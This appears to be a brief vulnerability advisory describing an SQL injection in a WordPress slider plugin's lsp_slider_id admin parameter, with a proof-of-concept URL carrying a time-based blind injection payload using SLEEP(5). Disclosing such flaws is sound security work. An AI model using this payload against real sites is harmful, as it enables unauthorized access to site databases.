The plugin does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=manage_images&lsp_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)